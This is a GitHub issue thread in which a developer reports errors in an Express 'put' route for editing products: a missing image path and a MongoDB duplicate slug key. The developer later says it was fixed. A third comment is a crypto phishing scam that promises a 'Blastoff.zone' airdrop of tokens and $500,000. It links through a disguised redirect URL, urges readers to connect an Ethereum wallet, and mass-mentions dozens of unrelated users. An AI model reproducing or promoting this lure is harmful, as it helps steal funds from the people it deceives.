### ISSUE TITLE
Put request gear / blog

### ISSUE THREAD

**Issue by ZMoberg** [ZMoberg/lefiatV2#1]
edit / put route function throwing error 

When the product image field is left blank, it returns

`undefined [Object: null prototype] {
  title: 'joey',
  price: '123',
  weight: '123',
  description: 'lorem'
}
(node:5293) UnhandledPromiseRejectionWarning: TypeError: Cannot read property 'path' of undefined
    at /Users/Zack/Desktop/LeFIAT/lefiatV2/routes/gear.js:81:34`

When all the fields in the product fields are filled out returns a duplicate key

`MongoServerError: E11000 duplicate key error collection: lefiatv2.products index: slug_1 dup key: { slug: "joey" }
    at /Users/Zack/Desktop/LeFIAT/lefiatV2/node_modules/mongodb/lib/operations/update.js:80:33`

**Comment by ZMoberg** [comment]
Issue had to do with the db setup. Also configured to handle windows case of file uploads containing  :

**Comment by sobin007** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
gyss, @martianmad, @sh7ning, @phurisoft, @boyuanx, @gaspardip, @shahriar1, @pcherkashin, @alejagapatrick, @wangdiee, @1lphabe3, @rglover, @L-F-Escobar, @GDdark, @Aizener, @heythanks, @yottayocto, @oliver-day, @iranica, @kenifxyz, @puhuarty, @zhuoyue95, @aron10, @ImpulziveMyztik, @mongris, @karthickthankyou, @hiifong, @yusufCanAkier, @raihanadf, @thisguy726, @YohanTz, @nestyxx, @30mb1, @premshankerjillella, @m4ns0ur, @rycont, @Jackey65536, @amit-chaudhari1, @laurenamy, @BhargavMahajan, @ShevaShen, @JounQin, @Dionysus94, @nonInfelix, @VladimirWork, @MikelArnaiz, @tigerlove, @jiyoung-99, @KimhabOrk, @anarkrypto
